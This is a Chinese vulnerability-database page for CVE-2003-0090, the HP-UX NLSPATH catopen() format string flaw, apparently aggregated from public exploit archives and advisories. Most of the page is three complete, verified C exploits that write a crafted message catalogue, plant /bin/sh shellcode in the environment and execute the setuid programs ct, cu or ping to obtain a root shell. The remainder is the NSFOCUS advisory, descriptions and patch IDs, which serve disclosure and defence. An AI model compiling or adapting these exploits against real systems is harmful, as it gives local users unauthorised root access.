CVE-2003-0090
CVSSN/A
发布时间 :2003-12-15 00:00:00
修订时间 :2008-09-10 15:17:53
NMOEPS    

[原文]** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2000-0844. Reason: This candidate is a duplicate of CVE-2000-0844. Notes: All CVE users should reference CVE-2000-0844 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.


[CNNVD]CNNVD数据暂缺。


[机译]* REJECT **不要使用该候选号码。

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0090
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0090
(官方数据源) NVD

- 其它链接及资源

- 漏洞信息 (134)

HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit (EDBID:134)
hp-ux local
2003-12-16 Verified
0 watercloud
N/A [点击下载]
/*******************************************************************************
*  File    : x_hp-ux11i_nls_ct.c
*  Usage   : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
*  Purpose : Get a local rootshell from /usr/bin/ct,using HP-UX location language format string bug.
*  Author  : watercloud xfocus org 
*  Tested  : On HP-UX B11.11 .
******************************************************************************/


#include<stdio.h>

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/bin/ct abc_ "
#define MSG "\$set 1\n1128 "
#define PRT_ARG_NUM 2    
#define STACK_LEN 0x180  

#define ENV_BEGIN 0x40   
#define ENV_LEN   0x40  
#define LOW_STACK 0x210  

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      
unsigned int dstaddr = 0;    

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
    unsigned int * pa = (unsigned int*)env;
    FILE * fp = NULL;
    int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  

    int alig1= ENV_BEGIN - xnum*8;
    int alig2=0;
    int i=0;

    while(*pa != NULL)    
        *pa++=0;
    
    if(strlen(CMD) >ENV_BEGIN-3)
    {
        printf("No enough space to alig our env!\n");
        exit(1);
    }

	printf("Exploite for HP-UX 11i NLS format bug by command ct.\n");
	printf("From watercloud@xfocus.org.  2003-1-4\n");
	printf("   Site : http://www.xfocus.net (CN).\n");
	printf("   Site : http://www.xfocus.org (EN).\n");


    haddr = (unsigned int)&fp & 0xffff0000;
    if(alig1 < 0)
      alig1+=0x10000;
    alig2 = (haddr >> 16) - alig1 -xnum*8 ;
    if(alig2 < 0)
      alig2+=0x10000;

    dstaddr= haddr+ LOW_STACK + STACK_LEN -24;  
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint++=dstaddr;
    *pint = 0;
    
    /* begin to make our .cat file */
    fp = fopen("/tmp/.ex.k","w");
    if(fp == NULL)
    {
      printf("open file : /tmp/.ex.k for write error.\n");
      exit(1);
    }
    fprintf(fp,"%s",MSG);
    for(;i<xnum;i++)
      fprintf(fp,"%%.8x");
    fprintf(fp,"%%.%ix%%n",alig1);
    fprintf(fp,"%%.%ix%%hn",alig2);
    fclose(fp);
    fp = NULL;
    system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
    unlink("/tmp/.ex.k");


    sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
    putenv(buffer);
    putenv(PATH);
    putenv(TERM);
    putenv(NLSPATH);
    
    printf("¼ÇµÃɾ³ýÕâ¸öÁÙʱÎļþ(Remember to delete the  file): /tmp/.ex.cat .\n");
    execl("/usr/bin/ct","/usr/bin/ct","abc_",0);   /* ºÃÏ·¿ªÊ¼ÁË £º£©  */
} 


// milw0rm.com [2003-12-16]
		

- 漏洞信息 (23341)

HP-UX 10/11 NLSPATH Environment Variable Format String Vulnerability (1) (EDBID:23341)
hp-ux local
2003-04-01 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/8985/info

HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

/*********************************************************************************************
*  Name    : x_hpux_11i_nls_cu.c
*  Usage   : cc x_hpux_11i_nls_cu.c -o x_cu ; ./x_cu
*  Purpose :
*    Get local rootshell from /usr/sbin/ping using HPUX location language format string bug.
*  Author  : watercloud 
*  Date    : 2003-1-4
*  Tested  : On HP-UX B11.11
*  Note    : Use as your risk! 
*********************************************************************************************/
#include<stdio.h>

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/bin/cu abc_ "
#define MSG "\$set 1\n32 "
#define PRT_ARG_NUM 2    /* xprintf([x1],[x2],"fm" . .) x1 and x2 all exists eq 3  */
#define STACK_LEN 0x1c0  /* The space of caller-fprintf to main function stack offset  */

#define ENV_BEGIN 0x40   /* Our buffer put in TZ ENV's begin address */
#define ENV_LEN   0x40   /* Our env len */
#define LOW_STACK 0x210  /* Our's main stack begin addr, for all program because our env len :) */

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      /* heigh 16 bit of stack address    */
unsigned int dstaddr = 0;    /* fprintf's return addr store here */

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
	unsigned int * pa = (unsigned int*)env;
	FILE * fp = NULL;
	int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  /* the number of %.8x */
	int alig1= ENV_BEGIN - xnum*8;
	int alig2=0;
	int i=0;

	while(*pa != NULL)         /* clean all env */
		*pa++=0;
	
	if(strlen(CMD) >ENV_BEGIN-3)
	{
		printf("No enough space to alig our env!\n");
		exit(1);
	}

	haddr = (unsigned int)&fp & 0xffff0000;
	if(alig1 < 0)
	  alig1+=0x10000;
	alig2 = (haddr >> 16) - alig1 -xnum*8 ;
	if(alig2 < 0)
	  alig2+=0x10000;

	dstaddr= haddr+ LOW_STACK + STACK_LEN -24;   /* fprintf's return addr stored here */ 
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint = 0;
	
	/* begin to make our .cat file */
	fp = fopen("/tmp/.ex.k","w");
	if(fp == NULL)
	{
	  printf("open file : /tmp/.ex.k for write error.\n");
	  exit(1);
	}
	fprintf(fp,"%s",MSG);
	for(;i<xnum;i++)
	  fprintf(fp,"%%.8x");
	fprintf(fp,"%%.%ix%%n",alig1);
	fprintf(fp,"%%.%ix%%hn",alig2);
	fclose(fp);
	fp = NULL;
	system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
	unlink("/tmp/.ex.k");
	/* end make our .cat file */

	/* put our env,store our shellcode and address info . . . and so on */
	sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
	putenv(buffer);
	putenv(PATH);
	putenv(TERM);
	putenv(NLSPATH);
	
	printf("�ǵ�ɾ�������ʱ�ļ�(Remember to delete the  file): /tmp/.ex.cat .\n");
	execl("/usr/bin/cu","/usr/bin/cu","abc_",0);   /* ��Ϸ��ʼ�� ����  */
}		

- 漏洞信息 (23342)

HP-UX 10/11 NLSPATH Environment Variable Format String Vulnerability (2) (EDBID:23342)
hp-ux local
2003-04-01 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/8985/info
 
HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

/*********************************************************************************************
*  Name    : x_hpux_11i_nls_ping.c
*  Usage   : cc x_hpux_11i_nls_ping.c -o x_ping ; ./x_ping
*  Purpose :
*    Get local rootshell from /usr/sbin/ping using HPUX location language format string bug.
*  Author  : watercloud 
*  Date    : 2003-1-4
*  Tested  : On HP-UX B11.11
*  Note    : Use as your risk! 
*********************************************************************************************/
#include<stdio.h>

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD  "/usr/sbin/ping abc_ "
#define MSG "\$set 1\n2 "
#define PRT_ARG_NUM 1    /* xprintf([x1],[x2],"fm" . .) x1 and x2 all exists eq 3  */
#define STACK_LEN 0x140  /* The space of caller-fprintf to main function stack offset  */

#define ENV_BEGIN 0x40   /* Our buffer put in TZ ENV's begin address */
#define ENV_LEN   0x40   /* Our env len */
#define LOW_STACK 0x210  /* Our's main stack begin addr, for all program because our env len :) */

char buffer[512];
char buff[72]=
  "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
  "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
  "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
  "/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;      /* heigh 16 bit of stack address    */
unsigned int dstaddr = 0;    /* fprintf's return addr store here */

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
	unsigned int * pa = (unsigned int*)env;
	FILE * fp = NULL;
	int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;  /* the number of %.8x */
	int alig1= ENV_BEGIN - xnum*8;
	int alig2=0;
	int i=0;

	while(*pa != NULL)         /* clean all env */
		*pa++=0;
	
	if(strlen(CMD) >ENV_BEGIN-3)
	{
		printf("No enough space to alig our env!\n");
		exit(1);
	}

	haddr = (unsigned int)&fp & 0xffff0000;
	if(alig1 < 0)
	  alig1+=0x10000;
	alig2 = (haddr >> 16) - alig1 -xnum*8 ;
	if(alig2 < 0)
	  alig2+=0x10000;

	dstaddr= haddr+ LOW_STACK + STACK_LEN -24;   /* fprintf's return addr stored here */ 
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint++=dstaddr;
	*pint = 0;
	
	/* begin to make our .cat file */
	fp = fopen("/tmp/.ex.k","w");
	if(fp == NULL)
	{
	  printf("open file : /tmp/.ex.k for write error.\n");
	  exit(1);
	}
	fprintf(fp,"%s",MSG);
	for(;i<xnum;i++)
	  fprintf(fp,"%%.8x");
	fprintf(fp,"%%.%ix%%n",alig1);
	fprintf(fp,"%%.%ix%%hn",alig2);
	fclose(fp);
	fp = NULL;
	system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
	unlink("/tmp/.ex.k");
	/* end make our .cat file */

	/* put our env,store our shellcode and address info . . . and so on */
	sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
	putenv(buffer);
	putenv(PATH);
	putenv(TERM);
	putenv(NLSPATH);
	
	printf("�ǵ�ɾ�������ʱ�ļ�(Remember to delete the  file): /tmp/.ex.cat .\n");
	execl("/usr/sbin/ping","/usr/sbin/ping","abc_",0);   /* ��Ϸ��ʼ�� ����  */
}
		

- 漏洞信息 (F32179)

sa2003-08.txt (PacketStormID:F32179)
2003-11-14 00:00:00
NSFOCUS  nsfocus.com
advisory,local,root
hpux
CVE-2003-0090
[点击下载]

NSFOCUS Security Advisory SA2003-08 - Do to a lack of input validation on the NLSPATH variable, libc on HP-UX is susceptible to a format string vulnerability that will allow a local attacker to gain root privileges.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NSFOCUS Security Advisory(SA2003-08)

Topic: HP-UX libc NLSPATH Environment Variable Privilege Elevation Vulnerability

Release Date: 2003-11-13

CVE CAN ID: CAN-2003-0090

http://www.nsfocus.com/english/homepage/research/0308.htm

Affected system:
===================
- - HP-UX B.11.00
- - HP-UX B.11.11

Summary:
=========

NSFOCUS Security Team has found that the libc in HP-UX cannot restrict the
NLSPATH variable used by suid root program, which causes a format string 
vulnerability. Exploiting the vulnerability local attacker could gain root 
privilege.

Description:
============

Many programs in HP-UX use catopen()/catgets() and other functions in libc
to display localized information. When catopen() has detected the environment
variable NLSPATH, it will open the specified file and read messages from
it.

However, catopen() doesn't restrict the suid root program uses NLSPATH, which
allows local attackers to set NLSPATH variable and specify a locale file
crafted by themselves. When the suid root program uses catopen() to open the
message file and passes the data from it to *printf(), it might cause a format
string vulnerability.

Any suid root program that uses catopen()/catgets() maybe vulnerable. By exploiting
the vulnerability local attackers could gain root privilege.

According to the test, at least the following programs are vulnerable:

- -r-sr-xr-x   1 root       bin          45056 Nov 14  2000 /usr/bin/at
- -r-sr-xr-x   1 root       bin          24576 Nov 14  2000 /usr/bin/crontab
- -r-sr-xr-x   1 root       bin          45056 Nov 14  2000 /usr/bin/ct
- -r-sr-xr-x   1 root       bin          36864 Apr 19  2001 /usr/bin/cu
- -r-sr-xr-x   1 root       bin          20480 Nov 14  2000 /usr/lbin/exrecover
- -r-sr-xr-x   1 root       bin          40960 Aug 16  2001 /usr/bin/lp
- -r-sr-sr-x   2 root       mail         45056 Nov 14  2000 /usr/bin/mail
- -r-sr-xr-x   5 root       bin          45056 Nov 14  2000 /usr/bin/passwd
- -r-sr-xr-x   1 root       bin          24576 Nov 14  2000 /usr/bin/su
- -r-sr-xr-x  11 root       bin        1921024 Nov  6  2001 /usr/sbin/swinstall
- -r-sr-xr-x   2 root       bin        1028096 Nov  6  2001 /usr/sbin/swpackage

Workaround:
=============

NSFOCUS suggests to temporarily remove the suid root bit for all the
programs. However, it might brings about many inconvenience. You are suggested
to apply the appropriate patch at the earliest possibility.

Vendor Status:
==============

2002.11.19 Informed the vendor
2002.12.05 Vendor confirmed the vulnerability
2003.11.05 Vendor released a security bulletin (HPSBUX0311-294) and relative
            patches for the vulnerability.

Detailed information for the HP security bulletin is available at:
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0311-294

Note: Valid ITRC account is required for the link above.

Patch ID:

HP-UX B.11.22 PHCO_29329
HP-UX B.11.11 PHCO_29495
HP-UX B.11.00 PHCO_29284
HP-UX B.10.20 PHCO_26158

Additional Information:
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2003-0090 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems. Candidates may change significantly before they become official
CVE entries.

Acknowledgment
===============

Yang Jilong of NSFOCUS Security Team found the vulnerability.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.


NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 aF6DA
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/s1KJ1794d8am9toRAjuxAJ9G7Y0zGPICg3Xi4HEOcWaTqAEXnwCfcMjj
IrBO1cVWJ0MLfLUdK0C8fAY=
=McFd
-----END PGP SIGNATURE-----

    

- 漏洞信息

2782
HP-UX NLSPATH Local Privilege Escalation
Exploit Public Vendor Verified

- 漏洞描述

HP-UX contains a flaw that allows malicious users to gain root priveleges. The issue is due to the fact that root can't restrict the paths set in the "NLSPATH" environment variable for SUID programs. Any program on the system that is SUID and uses the "catopen()" function can be exploited to open a specially created file which results in a format string vulnerability.

- 时间线

2003-11-07 2002-11-19
Unknow 2002-11-05

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Hewlett-Packard has released a patch to address this vulnerability: Version/Patch # B.11.22/PHCO_29329 B.11.11/PHCO_29495 B.11.00/PHCO_29284 B.10.20/PHCO_26158

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP-UX NLSPATH Environment Variable Format String Vulnerability
Design Error 8985
No Yes
2003-11-05 12:00:00 2009-07-12 12:56:00
Discovery is credited to NSFocus.

- 受影响的程序版本

HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20

- 漏洞讨论

HP-UX allows the NLSPATH to be set for setuid root programs, which use catopen(3C) and may be executed by other local users. This could result in privilege escalation as an attacker could specify an arbitrary path for a message catalogue, which will be opened with elevated privileges.

- 漏洞利用

The following proof of concept exploit was supplied by watercloud@xfocus.org:

- 解决方案

HP has released a revised advisory (SSRT3656) and the following patches to address this issue:


HP HP-UX 10.20

HP HP-UX 11.0

HP HP-UX 11.0 4

HP HP-UX 11.11

HP HP-UX 11.22

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站